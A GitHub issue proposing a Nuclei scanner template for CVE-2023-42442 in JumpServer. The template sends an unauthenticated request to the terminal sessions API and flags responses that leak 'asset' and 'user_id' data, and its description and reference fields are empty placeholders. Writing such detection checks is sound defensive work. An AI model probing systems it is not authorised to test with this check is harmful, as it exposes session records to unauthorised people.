### ISSUE TITLE
CVE-2023-42442

### ISSUE THREAD

**Issue by Axianke** [projectdiscovery/nuclei-templates#8233]
```yaml
id: CVE-2023-42442

info:
  name: CVE-2023-42442
  author: xianke
  severity: high
  description: description
  reference:
    - https://
  tags: CVE-2023-42442,JumpServer

requests:
  - raw:
      - |+
        GET /api/v1/terminal/sessions/ HTTP/1.1
        Host: {{Hostname}}
        accept: */*
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8
        Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - "asset"
          - "user_id"
```
